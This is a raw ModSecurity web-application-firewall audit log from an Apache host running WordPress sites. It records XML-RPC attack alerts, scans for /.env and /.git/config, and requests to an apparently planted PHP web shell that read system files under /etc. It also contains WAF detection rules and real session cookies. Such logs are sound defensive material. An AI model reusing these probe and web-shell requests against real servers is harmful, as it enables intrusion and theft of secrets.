"CWAF"] [tag "WordPress"] [hostname "sarainternational.cstechns.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE6qvjS8xKUOR1xBR5bmhQAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749985982064854 1371531 (- - -) Stopwatch2: 1749985982064854 1371531; combined=2923, p1=391, p2=2428, p3=0, p4=0, p5=103, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6ac59f5c-Z-- --e50a302f-A-- [15/Jun/2025:16:43:11.103777 +0530] aE6qxv8FdgdWhWX4liCTwAAAAAs 165.22.247.248 46710 127.0.0.1 7081 --e50a302f-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 Cookie: PHPSESSID=rs6thbv2c5htbgnidlqpqlin5i; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_6424e10576d723e424a36f8ff15732%7C%7C1750158789%7C%7C1750155189%7C%7C67086eb1b781733edab178899a4157d4; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=9d3b49ea162b4cde1a2a3e6e7ede7e6e%7C%7C1750158789%7C%7C1750155189%7C%7Cf7eeb7c9fbbcb9e5379db5fcb3418493 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --e50a302f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=bv2t84rommaunupvoecjsjqhdr; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_94ba3ef3a941c8a59df7f1122f0c3e%7C%7C1750158790%7C%7C1750155190%7C%7Ce79b159a2a41efd1012ecd7611e6dc5f; expires=Tue, 17 Jun 2025 11:13:10 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=7caca689533d57220f4e09b4b02971e6%7C%7C1750158791%7C%7C1750155191%7C%7C34ff59ae29d3dcef3fc61a480efd4470; expires=Tue, 17 Jun 2025 11:13:11 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --e50a302f-E-- --e50a302f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6qxv8FdgdWhWX4liCTwAAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749985990041887 1061969 (- - -) Stopwatch2: 1749985990041887 1061969; combined=3144, p1=361, p2=2415, p3=98, p4=37, p5=146, sr=85, sw=87, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e50a302f-Z-- --7bc70c63-A-- [15/Jun/2025:16:44:11.499619 +0530] aE6rAv8FdgdWhWX4liCT9wAAAAs 165.22.247.248 37134 127.0.0.1 7081 --7bc70c63-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 500 Cookie: PHPSESSID=h39jos852jnumq7ctkjbhii0tt; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_50d3f1af64db8babf1fe1aa3041c6b%7C%7C1750158849%7C%7C1750155249%7C%7Cf42af197a2680806a4716f2ec188b315; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=d5297e02a8222106ca8b2a571686ad28%7C%7C1750158850%7C%7C1750155250%7C%7Cbd237b908e39f2f723ebed01acb69953 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --7bc70c63-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=76q1u6eus9armsi53mtdmrrmb6; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_447b5abfa87897acfa6bf54e133fc5%7C%7C1750158851%7C%7C1750155251%7C%7Cfc69cc228fb464acba93e6be4d906895; expires=Tue, 17 Jun 2025 11:14:11 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=0ee8ce7a6a2f0c8d8e42a0e49de5ae5f%7C%7C1750158851%7C%7C1750155251%7C%7C6508299eb76c306ca4ea8b78a552bce7; expires=Tue, 17 Jun 2025 11:14:11 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --7bc70c63-E-- --7bc70c63-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6rAv8FdgdWhWX4liCT9wAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749986050480387 1019313 (- - -) Stopwatch2: 1749986050480387 1019313; combined=2990, p1=391, p2=2121, p3=126, p4=41, p5=190, sr=103, sw=121, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7bc70c63-Z-- --cb837a55-A-- [15/Jun/2025:16:45:11.219116 +0530] aE6rPx_rKu9vEuWYHiZgIQAAAAk 167.99.81.166 38546 127.0.0.1 7080 --cb837a55-B-- GET /.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 167.99.81.166 Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --cb837a55-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb837a55-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env"] [unique_id "aE6rPx_rKu9vEuWYHiZgIQAAAAk"] Stopwatch: 1749986111216193 2986 (- - -) Stopwatch2: 1749986111216193 2986; combined=1746, p1=417, p2=1219, p3=17, p4=23, p5=69, sr=102, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cb837a55-Z-- --4517076a-A-- [15/Jun/2025:16:45:11.294075 +0530] aE6rPg9BijgXpeeI_r-9EwAAAAE 165.22.247.248 37772 127.0.0.1 7081 --4517076a-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 Cookie: PHPSESSID=5sel11mhi4v8n0garkuq1je6s2; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_647a1c9e8e9603a4424560d91f4e08%7C%7C1750158909%7C%7C1750155309%7C%7C4896e86fd96d575ecbcc217a307aa93d; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=58d314784f3ad365379d33bee9f8ccca%7C%7C1750158909%7C%7C1750155309%7C%7C94728c583550448c7082b3d9d1c1984d User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --4517076a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=502hr8u1ch3s0n5pbunpqaimhn; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_283297248b088fba649b25cc93ef13%7C%7C1750158911%7C%7C1750155311%7C%7Cf14a68508dbcfdc0b242c024bb2bd550; expires=Tue, 17 Jun 2025 11:15:11 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=c750b021cd17f697f25d454b4c850db8%7C%7C1750158911%7C%7C1750155311%7C%7C3646c330f4f64c5243c1cd956635f02b; expires=Tue, 17 Jun 2025 11:15:11 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --4517076a-E-- --4517076a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6rPg9BijgXpeeI_r-9EwAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749986110263138 1031016 (- - -) Stopwatch2: 1749986110263138 1031016; combined=3113, p1=412, p2=2310, p3=100, p4=37, p5=159, sr=106, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4517076a-Z-- --27707749-A-- [15/Jun/2025:16:45:11.430324 +0530] aE6rP_8FdgdWhWX4liCUbwAAAAs 167.99.81.166 38552 127.0.0.1 7080 --27707749-B-- GET /.git/config HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 167.99.81.166 Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --27707749-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --27707749-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/config"] [unique_id "aE6rP_8FdgdWhWX4liCUbwAAAAs"] Stopwatch: 1749986111427064 3318 (- - -) Stopwatch2: 1749986111427064 3318; combined=1992, p1=462, p2=1430, p3=20, p4=27, p5=53, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --27707749-Z-- --b0467c53-A-- [15/Jun/2025:16:45:51.935708 +0530] aE6rZ1u1-lKBbvo2E9o_NAAAAAw 34.194.14.255 56234 127.0.0.1 7081 --b0467c53-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/profile.d&viewfile=//etc/profile.d/Z99-cloud-locale-test.sh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 34.194.14.255 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --b0467c53-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4355 Connection: close Content-Type: text/html; charset=UTF-8 --b0467c53-H-- Message: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /etc/profile.d/z99-cloud-locale-test.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6rZ1u1-lKBbvo2E9o_NAAAAAw"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /etc/profile.d/z99-cloud-locale-test.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6rZ1u1-lKBbvo2E9o_NAAAAAw"] Apache-Handler: application/x-httpd-php Stopwatch: 1749986151930979 4784 (- - -) Stopwatch2: 1749986151930979 4784; combined=2665, p1=356, p2=2145, p3=42, p4=36, p5=85, sr=106, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b0467c53-Z-- --6403ac56-A-- [15/Jun/2025:16:45:59.796159 +0530] aE6rb2ah4jZQMChzmsZ_HAAAAAI 54.243.63.52 45370 127.0.0.1 7081 --6403ac56-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/security&viewfile=//etc/security/limits.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.243.63.52 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --6403ac56-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3717 Connection: close Content-Type: text/html; charset=UTF-8 --6403ac56-H-- Message: Warning. Matched phrase "etc/security/limits" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/limits found within ARGS:viewfile: /etc/security/limits.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/limits" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/limits found within ARGS:viewfile: /etc/security/limits.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6rb2ah4jZQMChzmsZ_HAAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1749986159792069 4142 (- - -) Stopwatch2: 1749986159792069 4142; combined=2340, p1=403, p2=1810, p3=38, p4=36, p5=53, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6403ac56-Z-- --ffcb4629-A-- [15/Jun/2025:16:46:12.005956 +0530] aE6rehRnvL96XFagPFC2bwAAAAY 165.22.247.248 45126 127.0.0.1 7081 --ffcb4629-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 Cookie: PHPSESSID=0fkth8jls2ik2fb2nfcriudsir; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_e90113c19ec5795ab8d0cf8b25aa77%7C%7C1750158970%7C%7C1750155370%7C%7C46f5ee25e4ac8ce545656a273afaea1c; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=a035abd02b2b812ca58248f7aad4bbe0%7C%7C1750158970%7C%7C1750155370%7C%7Cbba726f1a6fad275eccfc78c76521389 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --ffcb4629-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=cmfk4uu1r2kej4cak41bbkhrmj; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_1eea15c6fd4189da31ea5bcdcc688d%7C%7C1750158971%7C%7C1750155371%7C%7C97f10efae605ca6139f3d566eae1dd9d; expires=Tue, 17 Jun 2025 11:16:11 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=d496a863e78730cf2ffc51bff3919002%7C%7C1750158971%7C%7C1750155371%7C%7Cb743b0a563d568bc6e7a8ff35eac7c63; expires=Tue, 17 Jun 2025 11:16:11 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --ffcb4629-E-- --ffcb4629-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6rehRnvL96XFagPFC2bwAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749986170818929 1187102 (- - -) Stopwatch2: 1749986170818929 1187102; combined=2730, p1=372, p2=2006, p3=85, p4=39, p5=143, sr=88, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ffcb4629-Z-- --10e5d704-A-- [15/Jun/2025:16:47:12.185378 +0530] aE6rt1u1-lKBbvo2E9o_ZQAAAAw 165.22.247.248 51846 127.0.0.1 7081 --10e5d704-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 Cookie: PHPSESSID=e9g7ner42mfjubllfbpgarpvq2; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_e78c2ceaf51f62d525a48f16de24ce%7C%7C1750159030%7C%7C1750155430%7C%7Cbc493cdf72f6ff0fe7939c8295c09b28; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=a33086fbbce3624705a0eb8cb4e9c379%7C%7C1750159030%7C%7C1750155430%7C%7C732d88ec36d65ea712c9ca4d1149c5d9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --10e5d704-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=vbt5ph6re4t3dc1kft543ss6ln; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_ce9b02fde32b103a54b5629172112f%7C%7C1750159031%7C%7C1750155431%7C%7C13c653e44b771b9d207e30b24309ce36; expires=Tue, 17 Jun 2025 11:17:11 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=4633c6b6c251af264b024b2aedef01f5%7C%7C1750159032%7C%7C1750155432%7C%7C40d8d255ec6fd698a2e8400b572a9d01; expires=Tue, 17 Jun 2025 11:17:12 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --10e5d704-E-- --10e5d704-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6rt1u1-lKBbvo2E9o_ZQAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749986231019109 1166350 (- - -) Stopwatch2: 1749986231019109 1166350; combined=3298, p1=424, p2=2390, p3=135, p4=47, p5=186, sr=111, sw=116, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --10e5d704-Z-- --9c97e556-A-- [15/Jun/2025:16:48:12.246701 +0530] aE6r8w9BijgXpeeI_r-9bwAAAAE 165.22.247.248 51196 127.0.0.1 7081 --9c97e556-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=p14f8u9gff0pi0920an081qqof; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_ad580af867d76b6f21ed623e726d1a%7C%7C1750159090%7C%7C1750155490%7C%7C2afad458244321c4942ac96a35360f2a; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=6d23e1d7ec21c37434977fbd9cd0cc05%7C%7C1750159090%7C%7C1750155490%7C%7Ca8d2214369223895ebb7dc37ecdd9a59 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --9c97e556-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=oj2g86aloebqgknv8g9v82k669; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_f0d1a23f76ca30c175165b8533f651%7C%7C1750159092%7C%7C1750155492%7C%7C020e09f1d650781bb20a603d30cb15b1; expires=Tue, 17 Jun 2025 11:18:12 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=1e366860c992328333607ca7636f2fb9%7C%7C1750159092%7C%7C1750155492%7C%7C71e7e1c9c3251bb5718d25f3b5ab2f97; expires=Tue, 17 Jun 2025 11:18:12 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --9c97e556-E-- --9c97e556-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag 